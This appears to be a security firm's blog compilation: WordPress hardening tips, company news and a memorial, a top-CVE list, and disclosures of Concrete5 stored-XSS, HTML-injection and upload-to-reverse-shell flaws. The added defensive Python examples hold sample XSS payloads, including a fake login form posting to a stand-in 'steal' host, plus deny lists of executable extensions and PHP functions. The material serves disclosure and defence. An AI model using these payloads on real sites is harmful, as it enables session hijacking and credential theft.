Quite often when setting up a new WordPress website, users just keep the default admin username. Don't do this; choose a different name for the administrator account instead, as there are those who will try to brute force the admin username on WordPress login URLs.

2: Change your login URL and hide your WordPress

This can be done simply with a number of plugins. Both hiding the login page of your WordPress website and hiding any sign that the website is built with WordPress is a way to deter some of those who wish to hack your website.

3: Enable 2FA on your WordPress

Ensure you enable 2 Factor Authentication on your WordPress for that extra layer of security. This can be done by using a WordPress defence plugin such as Wordfence, which allows you to use Google 2FA solutions and has a number of other features that will help to secure your website.

4: Update your core, plugins & themes at all times

Due to the dynamic nature of open source, WordPress is constantly releasing new security updates for the core platform. Plugins and themes should also be regularly updated, and be careful of those that are no longer supported by their developer or have been forgotten about.

5: Delete and remove unnecessary plugins & themes

If you don't use a plugin or theme, delete it from your WordPress install, as unused components add more opportunities for vulnerabilities on your website.

6: Whitelist your IP for admin login

Another form of defence you can take for your WordPress website is to whitelist your IP (if it's static) so that you can log in to edit the website only from allowed locations. This will further reduce the opportunities for hackers to gain admin access to your website.

7: Ensure your hosting is secure, e.g. cPanel

A lot of WordPress websites use a web hosting control panel such as cPanel. Always make sure that you use a strong password and, if possible, enable 2FA to ensure better security. Often enough this is neglected, and a compromise of the web hosting control panel is just as bad, if not worse, than the compromise of the WordPress website.

8: Use a strong password

This should go without saying, but always use a strong password policy on your WordPress website to ensure that it is secure: use a combination of lowercase and uppercase letters with symbols and numbers. A newer method is to add a long phrase to make it even harder to crack.

9: Defend your users through the blog

Often enough, if your website has a blog that updates regularly, make sure to create another user just for posting on the blog and do not use the admin account to post. This will make it harder for hackers to discover which account is the administrator one if they can't see the name, and if they do somehow manage to gain access to the account that's blogging, it will have only very few permissions on the backend.

10: Disable comment fields and filter all contact forms

If you do not use the comment section on the website, make sure to disable it, as comments will often be spammed and could be vulnerable to stored XSS. Not only that, also make sure to filter all contact forms to allow only certain symbols, to ensure no XSS can be done through those either.

WordPress is a constantly evolving platform, and while it does have a lot of issues due to being open source, with careful attention and preparation you can avert a lot of the vulnerabilities it is often plagued by through carelessness or neglect.

Subscribe to the Edgescan blog to receive updates.

Theo Goyvaerts, Edgescan

### Looking Back on Edgescan in 2020

As we take a quick look back on 2020, we hope 2021 brings you all the success in the world. While 2020 didn’t go as expected, at Edgescan we will take the positives out of what has been, for many reasons, a tough year. The year started on a high as we celebrated our 6th birthday, released our annual Vulnerability Report and attended RSA and other live conferences before Covid-19 hit. The initial impact was for our whole company to seamlessly go fully remote, and we have been successfully operating in this way since. Looking back over Edgescan in 2020, here’s a short summary of some of the activities, events and interactions Team Edgescan participated in.

January

- Celebrated our 6th Birthday

February

- Released the Edgescan 2020 Vulnerability Report
- Attended RSA & Slándáil Global Security Conferences

March

- International Women’s Day celebrations at Edgescan HQ
- Edgescan moves all staff to work from home with Business as Usual!
- Sponsorship of Hack Trinity CTF
- Sponsors of BSides Dublin

April

- Pentesting workshop with students at TUDublin with Ciaran Byrne, Dearbhail Kirwan and Conor Cronin RIP.

May

- Hosted a webinar with PFH Technology
- Contributed to the Verizon Data Breach Investigations Report

June

- Edgescan won ‘Best Vulnerability Management 2020’ at the SC Awards
- Runner-up as Highly Commended for ‘Best Enterprise Security’ at the SC Awards
- Highly Commended Student of the Year: Edgescan team member Emma Heffernan
- Virtually attended Infosecurity Europe 2020
- Webinar on Edgescan API Discovery & New Developments
- Edgescan received a €10.5 Million investment from BGF
- We joined Barrier Networks for a webinar

July

- Attended the Securing Financial Services Virtual Summit
- Hosted a webinar on Selling Edgescan: The ABCs and 123s
- Shortlisted at the CRN Sales & Marketing Awards 2020
- Joined a webinar with David Sparks on Hacking Automation

August

- We hosted an Edgescan Webinar Series on Visibility
- Sponsorship of the Troy Hunt blog
- Q&A with Troy Hunt from Team Edgescan
- Virtual webinar on Filling the Gaps in Traditional Vulnerability Management
- Our EdgeDogs celebrated National Dog Day!

September

- Edgescan Webinar Series on Validation
- Webinar on API Security and Assessment
- Attended the Future of Cyber Security Virtual Conference
- ZeroDays CTF sponsored, however postponed until the new year!
October

- Eoin Keary spoke at Connect 2020 Virtual
- We sponsored ShellCon 2020
- James Mullen won Best Ethical Hacker / Pentester
- Sponsors of the Brian Krebs on Security blog
- Hosted another webinar with Rahim and Dearbhail on Continuity in Vulnerability Management
- Rahim spoke at the Media and Entertainment Day Conference
- Hosted another webinar on ‘Closing the Loop Faster for Security Risk’
- Teamed up with BPS for a ‘No Cost API Discovery Assessment’ webinar

November

- Eoin Keary spoke virtually at Cyber Security and Cloud Expo in North America
- We were announced as finalists in 3 categories for the Computing Security Awards

December

- We collaborated with TUDublin to deliver a pentesting workshop
- Winners at the Computing Security Awards: ‘Pen Testing Solution of the Year 2020’ & ‘Best Cloud-Delivered Security Solution 2020’
- Hosted our final webinar for 2020 with Accutech on Ethical Hacking

Rounding up 2020: while it was challenging and an extremely tough year, we believe we’ve come out with new ways of interacting, from daily virtual meetings to team 'Quarantini' cocktail nights to webinars. We found a new way to learn, grow, develop and succeed. With that said, we hope that as much as 2020 challenged us, it has made us stronger, and we will rise to whatever challenge 2021 has for #TeamEdgescan!

### More Vulnerabilities Discovered in Concrete5 by Edgescan Researcher

This blog post will address recent Stored Cross Site Scripting (XSS) and Stored HTML Injection vulnerabilities discovered by Edgescan Senior Information Security Consultant Guram Javakhishvili. These vulnerabilities were discovered while validating alerts as part of Edgescan’s human intelligence verification. Such discoveries are shared with clients so they can evaluate and mitigate the risks. The vendor is also notified so they can resolve the issues and improve the overall security of the application.
Concrete5 8.5.2 is vulnerable to Stored Cross Site Scripting (XSS) & Stored HTML Injection

- Software: concrete5, https://www.concrete5.org/
- Vulnerability: Cross Site Scripting (XSS) Stored & HTML Injection Stored
- Vulnerable component: Contact Us page & Private Messaging
- Vulnerability disclosed at: https://hackerone.com/reports/768327 & https://hackerone.com/reports/768313
- Vulnerable version: 8.5.2 Stable
- Fixed release: 8.5.4

Concrete5 is an open source content management system (CMS) written in PHP: complex websites made easy, a point-and-click, free CMS that creates websites. Concrete5 is used by major brands around the world, such as GlobalSign, U.S. Army, REC, BASF and many more (see the full list here). Concrete5 is designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page.

concrete5 version 8.5.2 suffers from persistent (stored) cross site scripting and HTML injection vulnerabilities. Insufficient validation of user input on both authenticated and unauthenticated parts of the concrete5 application exposes it to persistent cross site scripting (XSS) and HTML injection. These vulnerabilities allow potentially dangerous input from the user to be accepted by the application and then embedded back in the HTML response of the page returned by the web server.

1. Cross Site Scripting (XSS) Stored - Private messaging

Cross-site scripting is a flaw that allows users to inject HTML or JavaScript code into a page, enabling arbitrary input. Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim, in this case an administrative user, views the page. It is possible for the lowest-privileged user with access to private messaging to send a private message to the Administrator user containing a malicious cross-site scripting (XSS) payload.
Detailed description and steps to reproduce this bug: https://hackerone.com/reports/768313

- Resolution: Fixed in 8.5.4
- Vulnerable component: Private messaging
- List of vulnerable parameters: msgBody
- Attacker vector:
- Impact: An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server. Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim, in this case an administrative user, views the page.

2. Unauthenticated HTML Injection Stored - Contact Us form

concrete5 is prone to an HTML injection vulnerability because it fails to properly sanitize user-supplied input. An unauthenticated (public) user can inject arbitrary web script or HTML via the Contact Us form in the body of the message. The message gets sent to an administrator, and when the message is viewed or clicked by an administrative user, he/she will be redirected to a malicious site.

Detailed description and steps to reproduce this bug: https://hackerone.com/reports/768327

- Resolution: Fixed in 8.5.4
- Vulnerable component: Private messaging
- List of vulnerable parameters: msgBody
- Attacker vector: an injected HTML fragment rendering a fake login form (labelled "Phishing page", with "Username" and "Password" fields; the markup itself was stripped from this copy) together with an `onmouseover=prompt(1);//` event-handler attribute.
- Impact: An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server. An HTML injection vulnerability might lead to Cross-Site Scripting, Server-Side Request Forgery (SSRF) attacks or open a phishing page.

Steps you should take to secure your CMS applications from hacking

XSS attack payload types:

- Session hijacking
- Site defacement
- Network scanning
- Undermining CSRF defences
- Site redirection/phishing
- Data theft
- Keystroke logging
- Loading of remotely hosted scripts

Recommendations:

- These bugs have already been addressed by Concrete5, and the stable fixed release, version 8.5.4, is already out.
- Several defensive techniques are needed, depending on context, to prevent XSS attacks; in some cases it can be much harder, depending on the complexity of the application and the ways it handles user-controllable data. Example solutions:
  i. Content Security Policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities.
  ii. Validate input and encode output.
  iii. Use another layer of protection: a Web Application Firewall (WAF), which automatically protects against all or most of these vulnerabilities. Install security plugins to actively prevent hacking attempts. A WAF applies a set of rules to an HTTP conversation; generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. These plugins flag the weaknesses inherent in each platform and halt the hacking attempts that could threaten your application. WAFs may come in the form of an appliance, server plugin or filter, and may be customised to an application.
- It is crucially important to keep your installed scripts and CMS platforms up to date. Create a regular schedule to update or patch your CMS and all installed plugins and themes. Ensure all components are up to date.
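The "validate input and encode output" and CSP solutions above, and the contact-form filtering in WordPress tip 10 earlier on this page, as an added Python example that is not code from Concrete5, WordPress or Edgescan. It shows a stored message body (the msgBody field discussed above) rendered straight into an admin page beside the HTML-encoded rendering, an allow-list filter for free-text contact fields, and a constructed Content Security Policy; the sample message bodies, the page template and the header values are constructed for the demo and are assumptions, not taken from either project:

```python
"""Stored XSS / HTML injection in a message body: vulnerable rendering beside
the hardened one, plus the input filter and CSP header the post recommends.

Added example; not Concrete5's, WordPress's or Edgescan's code. Sample bodies,
template and header values are constructed for the demo (assumptions).
"""
import html
import re
from typing import Dict, List

# Constructed sample submissions to a contact form / private message body.
SAMPLE_BODIES: List[str] = [
    "Hello, I have a question about your pricing - can you call me?",
    "<img src=x onmouseover=prompt(1);// >",  # script via event-handler attribute
    '<form action="https://example.invalid/steal">Username: <input name=u></form>',  # fake login form
]

# Tip 10 style allow-list for a free-text contact field: letters, digits,
# whitespace and ordinary punctuation; no '<', '>', '"' or '&'.
ALLOWED_BODY = re.compile(r"^[A-Za-z0-9\s.,;:!?'()\-/@]*$")


def render_message_vulnerable(body: str) -> str:
    """'Before': the stored body is concatenated straight into the admin inbox page."""
    return f"<div class='message'>{body}</div>"


def render_message_safe(body: str) -> str:
    """'After': every untrusted character is HTML-encoded on output, so the
    browser displays the text instead of interpreting it as markup."""
    return f"<div class='message'>{html.escape(body, quote=True)}</div>"


def body_is_acceptable(body: str) -> bool:
    """Input validation (defence in depth): reject bodies outside the allow-list."""
    return len(body) <= 2000 and ALLOWED_BODY.fullmatch(body) is not None


def injected_markup_survives(body: str, rendered: str) -> bool:
    """Detection helper: did an opening tag from the input reach the page intact?"""
    return any(tag in rendered for tag in re.findall(r"<\s*[a-zA-Z][^>]*>", body))


def security_headers() -> Dict[str, str]:
    """Response headers that limit the blast radius of any XSS that slips
    through (constructed policy; the 'self' sources must match the real site)."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; "
            "base-uri 'self'; form-action 'self'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


def triage(bodies: List[str]) -> List[dict]:
    """Run each body through the filter and both renderers and report the outcome."""
    return [
        {
            "accepted_by_filter": body_is_acceptable(body),
            "vulnerable_render_executes": injected_markup_survives(body, render_message_vulnerable(body)),
            "safe_render_executes": injected_markup_survives(body, render_message_safe(body)),
        }
        for body in bodies
    ]


if __name__ == "__main__":
    for body, row in zip(SAMPLE_BODIES, triage(SAMPLE_BODIES)):
        print(f"{body[:40]!r:45} {row}")
    print(security_headers())
```

Output encoding is the control that actually closes the hole: the allow-list rejects the two hostile samples, but a real contact form often has to accept characters such as `&` or `<`, so the encoded renderer must be correct on its own, and the CSP header is there so that a script that still slips into the page cannot load from, or post to, an attacker-controlled origin.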
- At a minimum, a weekly update is equally important. Regularly back up the CMS and its underlying database.
- Subscribe to a regularly updated list of vulnerabilities for the specific CMS being used.
- More training and resources are available from the Edgescan blog posts ‘Secure Application Development Training Material’ & ‘XSS Attack & Defense’.

Subscribe to the Edgescan blog to receive updates.

Guram Javakhishvili, Senior Information Security Consultant, Edgescan

Securing CMS Platforms with DAST

Content management systems can be an easy target for attackers. Our Dynamic Application Security Testing (DAST) identifies and remediates vulnerabilities in platforms like Concrete5. Operating from Dublin and New York, we ensure your CMS is secure from exploitation.

### Edgescan Identifies Top 5 CVEs Weaponized by Cyber Criminals

As we put the finishing touches to the Edgescan 2021 Vulnerability Statistics Report, it has become clear that criminals are leveraging known, unpatched vulnerabilities in order to launch attacks on unsuspecting organisations. We have compiled a list of the top 5; the list includes the CVE, its impact and the threat actors taking advantage of the vulnerabilities. At Edgescan, we do what we can to inform the global security community, so knowing this list of the Top 5 CVEs weaponised by cyber criminals is useful. The Edgescan 2021 Stats Report will be published in February 2021; register your interest to receive a copy straight to your inbox when it's released.

1. CVE-2019-0708 - often known as BlueKeep

- CVSS 2 Score: 10
- Impacted Systems: Microsoft Windows
- Description: A remote code execution vulnerability exists in Remote Desktop Services, formerly known as Terminal Services, when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.
- Impact: Someone can use the Remote Desktop feature of Windows to log in to your PC and take control. There is total information disclosure, resulting in all system files being revealed.
- Threat Actor: Kelvin SecTeam (Venezuela, Colombia, Peru)
- Reference Link: CVE-2019-0708 : A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unau (cvedetails.com)

2. CVE-2017-0143 - the DOUBLEPULSAR payload uses this CVE

- CVSS 2 Score: 9.3
- Impacted Systems: Microsoft SMB
- Description: The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
- Impact: A remote user can execute arbitrary code on the target system. A remote user can obtain potentially sensitive information on the target system. The WannaCrypt malware was using this exploit.
- Threat Actor: APT3 (China), Calypso (China)

3. CVE-2017-5638

- CVSS 2 Score: 10
- Impacted Systems: Apache Struts
- Description: The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
- Impact: A remote user can execute arbitrary operating system commands on the target system.
- Threat Actor: Lazarus Group (North Korea)

4. CVE-2017-5715 - also known as Spectre

- CVSS 2 Score: 4.7
- Impacted Systems: ARM, Intel
- Description: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.
- Impact: A local user can run specially crafted code to cause the CPU to speculatively execute an indirect branch, leaking memory contents from another process into a CPU cache, and then read the contents of the cache. A local user can view arbitrary virtual memory contents on the target CPU device.
- Threat Actor: Unknown

5. CVE-2017-10271 - used by cryptominers

- CVSS 2 Score: 5
- Impacted Systems: Oracle WebLogic Server
- Description: A remote user can exploit a flaw in the Oracle WebLogic Server WLS Security component to gain elevated privileges.
- Impact: A remote authenticated user can obtain data on the target system. A remote user can modify data on the target system. A remote user can cause denial of service conditions.
- Threat Actor: Rocke Gang (Chinese Cybercrime)
- Reference Link: Oracle WebLogic Server Flaws Let Remote User Gain Elevated Privileges, Modify Data, and Deny Service on the Target System - SecurityTracker

Visit our Vulnerability Statistics Resources for more information and to view the Edgescan 2020 Stats Report. Register your interest to receive one of the first copies of the 2021 Report, due in February 2021.

### Remembering Conor Cronin

Edgescan lost a team member four weeks ago. Conor wasn’t just a member of a team. He was our friend, our brother, someone who always cheered you up if you needed cheering up. He was the one you always enjoyed having a pint with.

He was funny to the bone.

Conor started with us as an intern almost 4 years ago, and I could tell on his first day that he would be around for a long time. I played pool with him that day and he reciprocated any sledging with an interest. He wasn’t very good!
Fast forward 3 years, and he beat me on the same table without me potting a ball. It was the same with work: he was better, he just needed to grow into it. He was the first person I asked to be a mentor each time someone new started, as he was a great advertisement for the type of person we have in the company. He was highly intelligent and eager to pass on the knowledge he had, and could do this with any type of personality.

I’ve spoken to anyone that would listen over the years about how I enjoy working at Edgescan, about the people I work with. It sounds like a cliché or something that companies bandy about a lot, but we’ve always tried to keep the ‘start-up atmosphere’ as we grew into a global organization. At times it’s been tough, or it’s seemed like we were moving away from that, but then as you’re leaving the office one evening and Conor drives by with his middle finger raised you realize nothing has changed at all!

We are like a family: we have our kooky uncles and quiet cousins with weird hairstyles, cool big sisters and geeky little brothers, that aunt that drinks a little bit too much. Conor was the bright brother that lit up a room. These are the people we spend most of our waking day with, the people that know us inside out, the ones you want to impress and have fun with. So when we lose someone it hits us like a ton of bricks; everything is now different. I'm not sure what else to say about it.

Conor had an accident while running to raise money for Movember. His family have asked for donations for this worthy cause, so if you have a couple of euros, dollars, or pesos please feel free to donate. If not, then that's fine too. https://ie.movember.com/mospace/14321044

To date, and thanks to Conor, Team Edgescan has raised over €120,000; of that, over €114,000 was raised in Conor's name, making him the top fundraiser in the world for Movember.

Conor's loss was felt far and wide; his loved ones and the organisations he touched have dedicated events in his memory. Irish artist Maser and singer-songwriter Damien Dempsey collaborated to create an original piece of artwork for #Movember. Titled ‘Meet Me At The Bridge’, the piece is inspired by conversations surrounding mental health and was brought to life on the iconic Samuel Beckett Bridge in remembrance of Mo Bro Conor.

RIP brother, we miss you!

Ciaran Byrne, Head of Platform Operations, Edgescan
Dublin 04/12/2020

### Edgescan Incorporated in USA

Leading Irish cyber security firm Edgescan further cements global market expansion with US company incorporation.

CEO Eoin Keary today announced that Edgescan is now incorporated in the USA. He said that “it provides us with a firm foothold in the USA allowing us to be closer to our North American clients." Edgescan has been providing fullstack vulnerability management, cyber security and pen testing services to US-based clients for a number of years. US clients include some of the world's largest media corporations, and US partners include AON, BPS, Arbala and Tevora.

COO Rahim Jina added, “Edgescan has a growing US-based sales team so being incorporated in the US allows us to aggressively hire and retain local staff. The legal standing gives us the necessary structure to work more effectively with our US customers.”

This is an exciting development for Edgescan and part of an aggressive global growth strategy since the recent €10.5M investment from Ireland’s largest growth capital investor, BGF.
Edgescan CFO Eoin Twohig said, “Growing our US presence allows us to better serve our customers in North America and will benefit all Edgescan clients”.

Dublin 04/11/2020

### Edgescan Questions & Answers with Troy Hunt Part 3

The Edgescan Team Sent Questions to Troy Hunt (Part 3 of 3)

Troy answers the following questions in this video:

- Just as traditional login credentials were somewhat reliable before MFA became vital, do you think at some point MFA as we know it would not be enough to secure an application user? If yes, can you think of what the next layer of user authentication mechanism would look like?
- While developing haveibeenpwned, did the thought ever cross your mind that this could be used as a counterproductive tool, i.e. used in a social engineering attack, obtaining information that could be used for leverage on a person who may be up to no good and forcing them to pay ransom to keep the data safe (having accounts they shouldn’t have, etc., on gambling/dating sites)?
- What advice would you give to companies like Edgescan to try to encourage other organisations to improve their policies around credentials? Should all developers be looking to hook into the haveibeenpwned API?
- Can a better experience while using MFA (multi-factor authentication) be created, especially for non-tech-savvy individuals?

Be sure to subscribe to the Edgescan Blog. Watch Part 2 here. Big thanks to Troy for being so generous with his time and to the Edgescan team for coming up with the questions.

Troy Hunt is behind "Have I Been Pwned" and is a Microsoft Regional Director and MVP who travels the world speaking at events and training technology professionals.

### Edgescan Questions & Answers with Troy Hunt Part 2

The Edgescan Team Sent Questions to Troy Hunt (Part 2 of 3)

Troy answers the following questions in this video:

- Does being a public figure within the cybersecurity world leave you more exposed as a target to malicious attacks? If so, how do you manage and deal with these?
- What developments do you see emerging within the field of cybersecurity that will shape the future landscape? (Troy's blog link)
- What advice do you have for the average internet user to help ensure they safeguard their passwords and data on a daily basis?
- Without revealing any sensitive information, what’s the most memorable test you’ve performed, and what made it so memorable? (Nissan blog link)
- What do you feel the greatest challenge is that a Cyber Security professional would face on a regular basis? (Home office blog link)
- Do you feel there are enough efforts being made to make cybersecurity more accessible to younger generations? If not, what might be done in your opinion?

Be sure to subscribe to the Edgescan Blog for the next instalment. Big thanks to Troy for being so generous with his time and to the Edgescan team for coming up with the questions.

Troy Hunt is behind "Have I Been Pwned" and is a Microsoft Regional Director and MVP who travels the world speaking at events and training technology professionals.

### What’s the Worst that can Happen? An Ode to Risk

Edgescan CEO/Founder Eoin Keary shares his blog on Risk

Risk: a widely used word in many walks of life, but do we understand what it means?

“Risk involves uncertainty about the effects/implications of an activity with respect to something that humans value (such as health, well-being, wealth, property or the environment), often focusing on negative, undesirable consequences.”

Cyber security often talks about risk: a high-risk vulnerability, or the risk of an event occurring. So, risk is related to the statistical occurrence of an event and the negative outcome. We often talk about likelihood and impact: the chance of something happening and the effect of it happening. As CISOs or cyber security professionals we try to first address items with the highest risk, or combination of likelihood and impact; we call this prioritization.
The reason we need to prioritize is because we can’t fix all the issues, and not every vulnerability is created equal. We all have limited capacity, budget and resources; we need to do the best we can with what we have. We try to discover risks via reviews of designs, procedures, technical system reviews and testing. Some of these activities are up-front and others are recurring, in order to keep pace with change in the environments we control and the environments we don’t control.

Keeping pace with risk is hard; we simply don’t have the manpower or budget to focus deeply on all risks to the business. Again, we need to focus on risks which are impactful or have a high chance of occurring. Automation is good for scale and frequency (keeping pace); we can use automation to detect vulnerabilities, but it's weak at determining actual risk (and alone is prone to false positives). The determination of risk is contextual, based on what the likelihood is, the impact to the systems in question and ultimately the business impact. Automation is not good at context. Risk is all about context. Without context we can’t determine priority. Without priority we can’t focus on what matters to the business.

In order to move the cybersecurity dial, improve resilience, and detect threats and weakness, I believe a combination of automation and human intelligence is required. At Edgescan our mantra is “let’s automate like crazy, but never at the cost of accuracy”. Accuracy is the combination of a few things:

- No false positives
- Appropriate risk rating
- Depth of coverage

Combining these aspects results in RELIABLE VULNERABILITY INTELLIGENCE. Vulnerability intelligence is actionable, prioritized and helps focus on what matters – a core aspect of the Edgescan approach.

### Vulnerabilities Discovered in Concrete5 by Edgescan Researcher

This blog post will address a recent RCE vulnerability discovered by Edgescan Senior Information Security Consultant Guram Javakhishvili.
These vulnerabilities were discovered while validating alerts as part of Edgescan’s human intelligence verification. These discoveries are shared with clients so they can evaluate and mitigate the risks. The vendor is also notified so they can resolve the issues and improve the overall security of the application.

Concrete5 8.5.2

Concrete5 CMS is a powerful open source content management system: a point-and-click, free CMS that creates websites. Concrete5 is used by major brands around the world, such as GlobalSign, U.S. Army, REC, BASF and many more (see the full list here). Concrete5 is designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page.

Issue: concrete5-8.5.2 Remote Code Execution - Reverse Shell
Software: concrete5 https://www.concrete5.org/
Vulnerability: Remote Code Execution - Reverse Shell
Vulnerable component: File Manager
Vulnerability disclosed at: https://hackerone.com/reports/768322
Vulnerable version: 8.5.2 Stable
Fixed release: 8.5.4

Remote Code Evaluation (Execution) is a type of application weakness that can be exploited when user input is injected into a file or a string and evaluated by the language's parser. Remote Code Evaluation is a very serious vulnerability, as it is usually easy to exploit and grants full access to an attacker immediately after being exploited. RCE can lead to a full compromise of the susceptible web application and also of the web server that it is hosted on. It is important to note that not only PHP but almost every programming language has code evaluation functions. While there are sites that allow you to run PHP code on demand, they severely limit what you can do and, most importantly, they thoroughly check your PHP code to eliminate execution of any dangerous, high-risk functions, for example exec and shell_exec.
During the assessment of Concrete5 version 8.5.2, it was noted that it was possible to modify the site configuration to upload a PHP file and execute arbitrary commands.

By default, file types such as PHP, HTML and other dangerous file extensions are not allowed, but it was possible to include the PHP extension in the allowed file list and then upload the file: https://documentation.concrete5.org/user-guide/editors-reference/dashboard/system-and-maintenance/files/allowed-file-types

The attacker needs the appropriate permissions (Admin role) in order to edit and allow other file types (file extensions). If a file type such as PHP is added, then the user will be able to upload potentially malicious PHP code and execute system commands. The code for the file upload function is located at \concrete\controllers\backend\file.php, which uses handleUpload() to upload the file and the ConcretePermissions() function to check the permitted file extensions; if the file's type is not in the allowed file type list then an exception is thrown.

Steps to Reproduce: Detailed HERE.

Impact

A reverse shell is a mechanism that allows an attacker to obtain a shell on the server by exploiting the web server to trigger a connection back. The attacker would be able to take full control over the web server (system). By executing arbitrary commands on the server, an attacker could compromise integrity, availability and confidentiality, and pivot onto other servers on the internal network.

How to Prevent Remote Code Evaluation

File upload forms are a major security threat.
If your application is required to allow the PHP extension, at least do not pass any user-controlled input (the content of the file) into evaluation functions or callbacks. That includes not letting users decide the names and extensions of the files that they wish to upload or create in the web application. Sanitizing user input is also an option, but this would not be the best solution, as it is most of the time not possible due to the number of possible bypasses of restrictions. In this particular case malicious PHP code is injected into a PHP file or a string and executed (evaluated) by the PHP parser.

Also, you can lock down your interpreter by changing the server configuration: if you can limit interpreter functionality to the minimum required for the application, you prevent escalation to system command injection. For example, if your application does not use the PHP system() function, you can disable that function in your php.ini file by specifying it in the disable_functions directive. The most common list of dangerous functions that you can disable for PHP is: exec(), passthru(), shell_exec(), system(), proc_open(), popen(), curl_exec(), curl_multi_exec(), parse_ini_file(), and show_source().

This bug has already been addressed by Concrete5 and the stable fixed release, version 8.5.4, is already out.

It is crucially important to keep your installed scripts and CMS platforms up to date:

- Create a regular schedule to update or patch your CMS, and all installed plugins and themes. Ensure all components are up-to-date. At a minimum, a weekly update is equally important.
- Regularly back up the CMS and its underlying database.
- Subscribe to a regularly-updated list of vulnerabilities for the specific CMS being used.
- Avoid use of default usernames (e.g., ‘admin’) and enforce a strong password policy for your CMS’s admin area and server to protect them from brute force attacks.
- Use a plugin for strong authentication, or two-factor authentication (2FA), for an additional layer of protection.
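The two controls described above, as an added example that is not Concrete5's code: an allow-list-only upload policy of the kind the post describes, beside a hardened one in which a server-side deny list of interpreter-handled extensions cannot be unlocked by any configuration change, double extensions are rejected, the file body is checked for PHP open tags, and the client's file name never reaches the disk. A second function audits a php.ini text against the disable_functions list from the paragraph above. The class and function names, the deny list, the upload root path and the sample php.ini are this example's own assumptions.

```python
"""Upload policy for a PHP-based CMS file manager, weak form beside hardened form.

Added example, not Concrete5 code. WeakUploadPolicy models the pre-fix logic
the post describes: the admin-editable allowed-extension list is the only
check, so adding "php" to that list is enough for executable uploads to be
accepted. HardenedUploadPolicy keeps a fixed server-side deny list that no
configuration change can override, rejects double extensions, inspects the
content for PHP open tags and never reuses the client-supplied file name.
undisabled_functions() audits a php.ini text against the disable_functions
advice. All class, function and constant names are this example's own.
"""
from __future__ import annotations

import os
import re
import secrets

# Extensions the web server hands to an interpreter (or the browser executes).
# Deliberately a constant, not configuration: the admin UI must not extend it.
EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "phps", "phtml", "phar", "pht",
    "inc", "cgi", "pl", "py", "sh", "htaccess", "html", "htm", "svg", "js",
})

# "<?php" or "<?=" anywhere in the body. Short open tags ("<? ") are not
# covered; disable short_open_tag in php.ini rather than widening this.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# The function list from the post, used by the php.ini audit below.
DANGEROUS_FUNCTIONS = (
    "exec", "passthru", "shell_exec", "system", "proc_open", "popen",
    "curl_exec", "curl_multi_exec", "parse_ini_file", "show_source",
)


def _extensions(filename: str) -> list[str]:
    """Every dotted suffix, lower-cased: 'Shell.PHP.jpg' -> ['php', 'jpg']."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


class WeakUploadPolicy:
    """Pre-fix behaviour: only the last extension, only the allow list."""

    def __init__(self, allowed: set[str]):
        self.allowed = {e.lower().lstrip(".") for e in allowed}

    def accept(self, filename: str) -> bool:
        exts = _extensions(filename)
        return bool(exts) and exts[-1] in self.allowed


class HardenedUploadPolicy:
    """Allow list still applies, but it cannot unlock anything executable."""

    def __init__(self, allowed: set[str], upload_root: str = "/var/www/uploads"):
        self.allowed = {e.lower().lstrip(".") for e in allowed}
        self.upload_root = upload_root  # assumed location outside the web root

    def check(self, filename: str, content: bytes) -> tuple[bool, str]:
        exts = _extensions(filename)
        if not exts:
            return False, "file has no extension"
        if any(e in EXECUTABLE_EXTENSIONS for e in exts):
            return False, f"executable extension in {filename!r}"
        if exts[-1] not in self.allowed:
            return False, f"extension {exts[-1]!r} is not in the allow list"
        if PHP_OPEN_TAG.search(content):
            return False, "PHP open tag found in file content"
        return True, "ok"

    def stored_path(self, filename: str) -> str:
        """Server-chosen name: random token plus the validated extension, so the
        client's name (and any path components in it) never reaches the disk."""
        return os.path.join(self.upload_root,
                            f"{secrets.token_hex(16)}.{_extensions(filename)[-1]}")


def undisabled_functions(php_ini: str) -> list[str]:
    """Dangerous functions that the php.ini text does not list in disable_functions."""
    disabled: set[str] = set()
    for raw in php_ini.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a php.ini comment
        if line.lower().startswith("disable_functions"):
            _, _, value = line.partition("=")
            disabled.update(f.strip().lower() for f in value.split(",") if f.strip())
    return [f for f in DANGEROUS_FUNCTIONS if f not in disabled]


# Constructed sample php.ini: only four of the ten functions are disabled.
SAMPLE_PHP_INI = """
; constructed sample, not a real server configuration
expose_php = Off
disable_functions = exec,passthru,shell_exec,system
"""


if __name__ == "__main__":
    weak = WeakUploadPolicy({"jpg", "png", "php"})       # admin added "php"
    hard = HardenedUploadPolicy({"jpg", "png", "php"})   # same list, hardened
    print("weak accepts upload.php:", weak.accept("upload.php"))
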